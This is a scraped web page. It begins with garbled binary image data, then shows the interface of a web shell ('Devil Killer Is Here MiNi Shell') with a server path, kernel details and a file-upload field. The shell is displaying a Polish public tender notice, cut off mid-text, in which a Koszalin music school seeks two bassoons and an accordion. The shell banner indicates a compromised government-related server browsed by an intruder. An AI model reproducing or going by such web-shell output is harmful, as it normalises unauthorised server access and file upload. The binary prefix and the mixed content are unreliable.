JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251013/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251013/0047152001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sprzedaż i dostawa nowych instrumentów muzycznych wraz z wyposażeniem towarzyszącym, w podziale na części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Państwowych Szkół Muzycznych im. Grażyny Bacewicz w Koszalinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000280643</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Juliana Fałata 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-434</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943478020</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zpsm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/zpsmkoszalin</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzedaż i dostawa nowych instrumentów muzycznych wraz z wyposażeniem towarzyszącym, w podziale na części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e78f30bc-3ca8-44e1-9dd9-bd00dd02b825</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00471520</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00131549/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Sprzedaż i dostawa nowych instrumentów muzycznych wraz z wyposażeniem towarzyszącym, w podziale na części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e78f30bc-3ca8-44e1-9dd9-bd00dd02b825 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy <br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych , elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w http://ezamowienia.gov.pl/pl/instrukcje/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE informujemy, że:<br/>•	Administratorem Pani/Pana danych osobowych jest Zespół Państwowych Szkół Muzycznych im. G. Bacewicz w Koszalinie, reprezentowany przez Dyrektora Szkoły (ul. Fałata 32, 75-434 Koszalin, tel. (94) 347 80 20, e-mail: sekretariat@zpsm.pl).<br/>•	Inspektorem Ochrony Danych Osobowych jest Krzysztof Czarnecki , e-mail: redakcja@zpsm.pl)<br/>•	Celem przetwarzania Pani/Pana danych osobowych jest postępowanie związane z udzieleniem zamówienia publicznego. <br/>•	Podstawą prawną przetwarzania Pani/Pana danych osobowych jest Pani/Pana zgoda wyrażona poprzez uczestnictwo w postępowaniu oraz przepisy prawa: art. 6 ust. 1 lit. c ) - RODO, ustawa z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t.j. Dz. U. z 2017 r. poz. 1579 ze zm.), rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U 2016 r. poz. 1126) <br/>•	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018). Dane Pani/Pana będą przekazywane wszystkim osobom i podmiotom zainteresowanym w związku prowadzeniem postępowania o udzielenie zamówienia publicznego (postępowanie jest jawne).<br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/><br/>•	Podanie przez Panią/Pana danych jest wymogiem ustawowym określonym w przepisach ustawy „Prawo zamówień Publicznych” związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z powyższej ustawy.<br/>•	posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, ograniczenia przetwarzania.<br/>•	ma Pan/Pani prawo wniesienia skargi do UODO (ul. Stawki 2, 00-193 Warszawa) gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.<br/>•	nie przysługuje Pani/Panu prawo do usunięcia danych osobowych, przenoszenia danych osobowych.<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KG.26.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 110000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Część I – 2 szt. nowe, nieużywane fagoty wraz z wyposażeniem towarzyszącym (2 sztuki):<br/>a)	1 szt. fagot wraz z wyposażeniem towarzyszącym:<br/>•	fagot wykonany z selekcjonowanego i sezonowanego drewna klonowego;<br/>•	mechanika posrebrzana twardym srebrem;<br/>•	czara głosowa z niemieckim wykończeniem- plastikowe kółko na czarze;<br/>•	zamek łączący skrzydło z rurą basową zamykany szpilką wsuwaną w górna część skrzydła obok;<br/>•	wejścia esu z systemem zabezpieczającym uszkodzenie korpusu drewnianego w przypadku;<br/>•	nierozpięcia zamka;<br/>•	klapa wysokie D w skrzydle;<br/>•	klapa trylowa e/fis w skrzydle;<br/>•	zamknięcie piano-systemu dla kciuka lewej ręki w skrzydle;<br/>•	klapa trylowa cis w stopie;<br/>•	osłona klapy B w stopie;<br/>•	osłona klapy E w stopie;<br/>•	osłona klapy D w rurze basowej;<br/>•	klapy długie, równoległe H i B w rurze basowej mocowane na osobnych osiach;<br/>•	klapa okularowa w skrzydle pod dźwięk d;<br/>•	klapa okularowa w stopie pod dźwięk h;<br/>•	niklowo-srebrne tuleje w otworach dźwiękowych d, e, f w skrzydle wchodzące w głąb kanału w celu;<br/>•	blokowania wpływania wody do otworu dźwiękowego;<br/>•	niklowo-srebrne tuleje w otworach dźwiękowych h, c oraz tuleja w klapie wysokie g w stopie;<br/>•	wchodzące w głąb kanału w celu blokowania wpływania wody do otworu dźwiękowego;<br/>•	rolka w klapie Cis w rurze basowej dla piątego palca;<br/>•	rolka w klapie Es w rurze basowej dla piątego palca;<br/>•	rolka w klapie F w stopie dla piątego palca;<br/>•	rolka w klapie As w stopie dla piątego palca;<br/>•	klapa trylowa B w stopie, dla czwartego palca;<br/>•	dwie klapy As w stopie: dla piątego palca oraz dodatkowa dla kciuka;<br/>•	es FOX C nr 1;<br/>•	es FOX C nr 2;<br/>•	podpórka pod prawą rękę;<br/>•	lekki profesjonalny futerał z dwiema rączkami, kieszenią na akcesoria, kieszenią na esy i kieszenią na nuty, z paskiem na ramię, dwiema szelkami na plecy oraz kapturem przeciwdeszczowym;<br/>•	wycior przeciągany do skrzydła ze sznurkiem zwrotnym;<br/>•	wycior przeciągany do stopy z metalową kółka;<br/>•	szmatka do polerowania mechaniki;<br/>•	pasek na szyję;<br/>•	pasek pod udo;<br/>•	korki na czopach rury basowej i skrzydła;<br/>•	smar do czopów;<br/>•	wylany otwór dźwiękowy pod dźwięk cis w skrzydle;<br/>•	kanał skrzydła i węższy kanał stopy wylany impregnatem;<br/>•	długi uchwyt balansowy z pięcioma otworami o długości około 130 mm;<br/>•	podwójna klapa C w rurze basowej;	<br/>•	otwór dźwiękowy pod klapę cis w skrzydle wylany impregnatem.<br/>b) 1 szt. fagot wraz z wyposażeniem towarzyszącym:<br/><br/>•	Instrument w stroju C;<br/>•	15 klap;<br/>•	mechanika dostosowana dla małych rąk dzieci;<br/>•	piano mechanika;<br/>•	zamknięcie piano systemu dla lewej ręki w skrzydle;<br/>•	podwójna klapa C;<br/>•	otwór dźwiękowy c w skrzydle zamykany klapą z poduszką;<br/>•	rolka w klapie F i rolka w klapie As w stopie;<br/>•	zamek łączący skrzydło z rurą basową;<br/>•	czara głosowa z Plexi®;<br/>•	skala do C wielkiego;<br/>•	plastikowe tuleje dźwiękowe w skrzydle i stopie;<br/>•	posrebrzana mechanika;<br/>•	drewno klon;<br/>•	korpus lakierowany;<br/>•	uchwyt balansowy z czterema otworami;<br/>•	piórnik na esy;<br/>• futerał typu Gig Bag typu plecak z jedną rączką i dwiema regulowanymi szelkami do noszenia na plecach, części fagotu wkładane od góry pionowo, w górnej klapie kieszeń na akcesoria, jedna boczna kieszeń na wyciory, przednia kieszeń przeznaczona na piórnik na esy.<br/><br/>c)	Wskazany przez Wykonawcę instrument do oceny musi mieć parametry zgodne z podanymi w specyfikacji warunków zamówienia przedmiotowego postępowania.<br/>d)	Zamawiający wymaga, aby Wykonawca, w celu oceny jakości oferowanych fagotów udostępnił po trzy fabrycznie nowe instrumenty, które są zgodne z opisem przedmiotu zamówienia. Fagoty te muszą spełniać wszystkie określone specyfikacje techniczne i jakościowe. Instrumenty te będą podlegały ocenie weryfikacyjnej, której wyniki stanowić będą podstawę do realizacji zamówienia.<br/>e)	Przedmiot zamówienia obejmuje również strojenie instrumentu .<br/>f)	Wykonawca jest zobowiązany udzielić Zamawiającemu min. <br/>24 miesięcznego okresu gwarancji od daty sporządzenia protokołu zdawczo-odbiorczego.<br/>g)	Zamawiający wymaga by w ramach ceny, w okresie gwarancji wykonanych zostało min. 1 przeglądów/serwisów instrumentu uwzględniających strojenie, regulację oraz intonację. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 55286 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37321600-0 - Pokrowce lub futerały na instrumenty muzyczne lub akcesoria</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach cena 30%, jakość 70%<br/>1)	Badany instrument będzie oceniany przez biegłych powołanych przez Kierownika Zamawiającego. <br/>2)	W przypadku, gdy oceny danego instrumentu będzie dokonywać więcej niż jedna osoba, każda z osób skierowanych do oceny przyzna punkty indywidualnie, a następnie suma przyznanych punktów zostanie podzielona przez ilość osób dokonujących oceny. <br/>3)	Z przeprowadzonej oceny zostanie spisany protokół z oceny instrumentu zawierający w szczególności nazwę wykonawcy, miejsce i datę oceny, nazwę, model instrumentu, numer seryjny/fabryczny ocenianego instrumentu, ocenę instrumentu zgodnie z kryteriami oceny ofert, uzasadnienie przyznanej ilości punktów, podpisy osób dokonujących oceny jakościowej instrumentów ze strony Zamawiającego. <br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/>5)	Punkty przyznane wykonawcy w zakresie każdego z kryteriów zostaną zsumowane. Suma punktów uzyskanych stanowić będzie końcową ocenę danej oferty. <br/>6)	W toku badania i oceny ofert Zamawiający może żądać udzielenia przez wykonawcę wyjaśnień dotyczących treści złożonej oferty oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń. <br/>7)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>8)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. <br/>9)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia <br/>w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Część II: 1 szt. nowy, nieużywany akordeon klawiszowy z wyposażeniem towarzyszącym:<br/>a)	1 szt. nowy nieużywany akordeon z wyposażeniem towarzyszącym:<br/>PRAWA RĘKA:<br/>•	klawisze/dźwięki 41;<br/>•	szerokość klawisza 19mm;<br/>•	zakres F/A;<br/>•	chóry 4;<br/>•	registry 15+M;<br/>•	registry brodowe 3;<br/>•	strój piccolo (16/8/8/4);<br/>• kanałowy (chóry 16 i 8 w kanale).<br/><br/>LEWA RĘKA<br/>•	basy 120;<br/>•	chóry 4;<br/>•	barytony 58;<br/>•	zakres E/C# (pełna skala);<br/>•	chóry barytonowe 2;<br/>•	strój barytonów 16/8;<br/>•	registry 5+R (dopalacz). <br/><br/>CECHY OGÓLNE: <br/>•	akordeon klawiszowy z konwerterem;<br/>• rozmiar (cm) 46x21x45;<br/>•	waga (kg) 12,9;<br/>•	kolor obudowy czarny, klawiatura i guziki w kolorze kości słoniowej;<br/>•	metalowa galeryjka;<br/>•	futerał miękki Cordura;<br/>•	pasy nośne;<br/>•	narzutka;<br/>•	zestaw do czyszczenia;<br/>•	rękawica na lewą rękę;<br/>•	dostawa 2025 rok.<br/>b)	Wskazany przez Wykonawcę instrument do oceny musi mieć parametry zgodne z podanymi w specyfikacji warunków zamówienia przedmiotowego postępowania. <br/>c)	Przedmiot zamówienia obejmuje również strojenie instrumentu.<br/>d)	Wykonawca jest zobowiązany udzielić Zamawiającemu min. 24 miesięcznego okresu gwarancji od daty sporządzenia protokołu zdawczo-odbiorczego. <br/>e)	Zamawiający wymaga by w ramach ceny, w okresie gwarancji wykonanych zostało min. 1 przeglądów/serwisów instrumentu uwzględniających strojenie, regulację oraz intonację. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 54714 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37321600-0 - Pokrowce lub futerały na instrumenty muzyczne lub akcesoria</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach cena 30%, jakość 70%<br/>1)	Badany instrument będzie oceniany przez biegłych powołanych przez Kierownika Zamawiającego. <br/>2)	W przypadku, gdy oceny danego instrumentu będzie dokonywać więcej niż jedna osoba, każda z osób skierowanych do oceny przyzna punkty indywidualnie, a następnie suma przyznanych punktów zostanie podzielona przez ilość osób dokonujących oceny. <br/>3)	Z przeprowadzonej oceny zostanie spisany protokół z oceny instrumentu zawierający w szczególności nazwę wykonawcy, miejsce i datę oceny, nazwę, model instrumentu, numer seryjny/fabryczny ocenianego instrumentu, ocenę instrumentu zgodnie z kryteriami oceny ofert, uzasadnienie przyznanej ilości punktów, podpisy osób dokonujących oceny jakościowej instrumentów ze strony Zamawiającego. <br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/>5)	Punkty przyznane wykonawcy w zakresie każdego z kryteriów zostaną zsumowane. Suma punktów uzyskanych stanowić będzie końcową ocenę danej oferty. <br/>6)	W toku badania i oceny ofert Zamawiający może żądać udzielenia przez wykonawcę wyjaśnień dotyczących treści złożonej oferty oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń. <br/>7)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>8)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. <br/>9)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia <br/>w terminie określonym przez zamawiającego ofert 